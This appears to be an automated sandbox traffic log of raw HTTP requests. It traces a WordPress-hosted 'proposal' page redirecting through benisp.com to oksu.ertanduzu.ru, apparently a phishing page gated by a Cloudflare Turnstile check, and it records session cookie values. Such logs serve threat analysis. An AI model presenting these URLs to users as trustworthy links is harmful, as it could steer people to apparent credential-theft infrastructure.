https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /t.gif?is_current_user_blog_owner=false&_en=wpcom_marketing_bar_impression&_ui=PfqOZc4jPU0a%2FtwKEstg1J5h&_ut=anon&_ts=1734709534238&_tz=5&_lg=en-US&_pf=Win32&_ht=1024&_wd=1280&_sx=0&_sy=0&_dl=https%3A%2F%2Fdnearymedahealthstaffing.wordpress.com%2Fmedahealthstaffing-proposal%2F&_dr=&blog_id=240074490&blog_tz=-8&user_lang=en&blog_lang=en&user_id=0&_rt=1734709534355&_=_ HTTP/1.1Host: pixel.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?m=1719498190i&ver=6.8-alpha-59438 HTTP/1.1Host: s2.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/blog-plugins/marketing-bar/images/wpcom-mark.svg HTTP/1.1Host: s1.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /g.gif?x_stats-initial-visibility=visible&v=wpcom-no-pv&rand=0.5533248508418851 HTTP/1.1Host: pixel.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /g.gif?blog=240074490&v=wpcom&tz=-8&user_id=0&post=22&subd=dnearymedahealthstaffing&host=dnearymedahealthstaffing.wordpress.com&ref=&rand=0.5972709169619024 HTTP/1.1Host: pixel.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /g.gif?crypt=UE40eW5QN0p8M2Y%2FRE1mJVY3bm9aR3VCbS9mWm1pRyZuJS1LX1t5QmRXZzE3RC9rQWZHK1FjbDltdWdaMVFFZTcxUGVHLWR0WTJoL2xleFp%2BVXNmM3xVflA0X254PXM%2FJWhaPXRUUXFLanh%2BVUI2Zyt4fE56Y2xlV1EtXzhlTXEuQW5uNFYlWVZkbnpVckd1ZCwzJlNVQkNHWTRoRzJnZVJ6bC04ZlFJdnJLUnpUb2dBLTJKQmhHfEs2fCUvb112ZTZGcHw2S0FYLWljXURFcXxoTVdkT05jSzIvb3Z5OU1LOXxEUHpaK3J1&v=wpcom-no-pv&rand=0.2779972937038586 HTTP/1.1Host: pixel.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /t.gif?is_current_user_blog_owner=false&_en=wpcom_marketing_bar_impression&_ui=PfqOZc4jPU0a%2FtwKEstg1J5h&_ut=anon&_ts=1734709534238&_tz=5&_lg=en-US&_pf=Win32&_ht=1024&_wd=1280&_sx=0&_sy=0&_dl=https%3A%2F%2Fdnearymedahealthstaffing.wordpress.com%2Fmedahealthstaffing-proposal%2F&_dr=&blog_id=240074490&blog_tz=-8&user_lang=en&blog_lang=en&user_id=0&_rt=1734709534355&_=_ HTTP/1.1Host: pixel.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/mu-plugins/actionbar/actionbar.css?v=20241015 HTTP/1.1Host: s0.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/mu-plugins/actionbar/actionbar.js?v=20231122 HTTP/1.1Host: s0.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /i/favicon.ico HTTP/1.1Host: s1.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?m=1719498190i&ver=6.8-alpha-59438 HTTP/1.1Host: s2.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /i/logo/wpcom-gray-white.png HTTP/1.1Host: s2.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-content/mu-plugins/actionbar/actionbar.js?v=20231122 HTTP/1.1Host: s0.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /i/favicon.ico HTTP/1.1Host: s1.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /wp-admin/admin-ajax.php HTTP/1.1Host: dnearymedahealthstaffing.wordpress.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tk_ai=PfqOZc4jPU0a%2FtwKEstg1J5h; tk_qs=
      Source: global trafficHTTP traffic detected: GET /i/logo/wpcom-gray-white.png HTTP/1.1Host: s2.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /c.gif?u=https%3A%2F%2Fbenisp.com%2Fdan%2Fdann%2Fdannn&r=&b=240074490&p=22&rand=0.1339836907307579 HTTP/1.1Host: pixel.wp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dan/dann/dannn HTTP/1.1Host: benisp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://dnearymedahealthstaffing.wordpress.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /c.gif?u=https%3A%2F%2Fbenisp.com%2Fdan%2Fdann%2Fdannn&r=&b=240074490&p=22&rand=0.1339836907307579 HTTP/1.1Host: pixel.wp.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: benisp.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://benisp.com/dan/dann/dannnAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /gk59Agp/ HTTP/1.1Host: oksu.ertanduzu.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://benisp.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oksu.ertanduzu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oksu.ertanduzu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oksu.ertanduzu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://oksu.ertanduzu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://oksu.ertanduzu.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f50c3606cea43b9&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: oksu.ertanduzu.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://oksu.ertanduzu.ru/gk59Agp/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkdkRDR6TmdqSjdvU1Aweml3MHIyUVE9PSIsInZhbHVlIjoiazh6MWQvSWo4OUtjN2IyZ1h0VlN2TnMxS1VLTkt6WDVLQmhaWjJ5N0NJdzRncHFPc0R2VHJwc2FoUVNsblVVVURsSm4rR3YwdkJaS3Q2MCtxVHdHaTA4T2l3K1FyMTJvdHZWYUpTVXZ1WmUybXZvU2ZPNlpMM284TUxQUWxacjciLCJtYWMiOiIzNmVlZjllNDM3OGY5OGZjZDYwMDE0NThiMWFjMWI5Mzg0ODQzMGJmOWJlMzY0NjI3YWExNzI4MWVhOWU4ZmE1IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlUvQi8zVk5CTXdQeUR3aFRGNjAyN2c9PSIsInZhbHVlIjoiaHZRZ3NzeDByQTJpWGUvYW9tNC9GVDZGci9hNGtWZ1hhSE1id3VxQ3RiL2JaL0plVURHWVBscTR4MThXQW5aNGxQTFBYYWVvb1NoQmhPTnV6Qk1GNmlzTHJXZytkcEg1eSt4NnN0Uk1yVUZ1a1YycnNwZ3R1Y3E1TlQwUkVyM1oiLCJtYWMiOiI2YTZmN2QwYjkzNjhjZjYxM2ZlZTFhNzYyNmM3YjllZmJkZWM2NmI3NzEzMjRmNGI3NjhiMzRlMzMwY2IyYmVhIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8f50c3606cea43b9&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/754265710:1734707715:oBMT5532Ii6sPNFHOfKD9tGFk1HjF6gPP9GcopH_rJw/8f50c3606cea43b9/2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f50c3606cea43b9/1734709569716/Kz4N4jYqxFwMXYk HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8f50c3606cea43b9/1734709569716/Kz4N4jYqxFwMXYk HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8f50c3606cea43b9/1734709569717/363a0ee5f22899df8d36d93aabc0f17f0a2db9459887d40a787601e0df99dc4e/1ElR6flOiKuTwDM HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/afqfh/0x4AAAAAAA2Jt48AqtrtyRlV/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/754265710:1734707715:oBMT5532Ii6sPNFHOfKD9tGFk1HjF6gPP9GcopH_rJw/8f50c3606cea43b9/2dqSYWK0Dd5nXPHgk9S1pzxDycBFfDqXb6x9mdxK90c-1734709565-1.1.1.1-yzCAYJr.4lhCJtr.2hHLhx9zHosqDbEA0AI8gSibNVVtpRjzXyrmk_Bja6dIoTRH HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
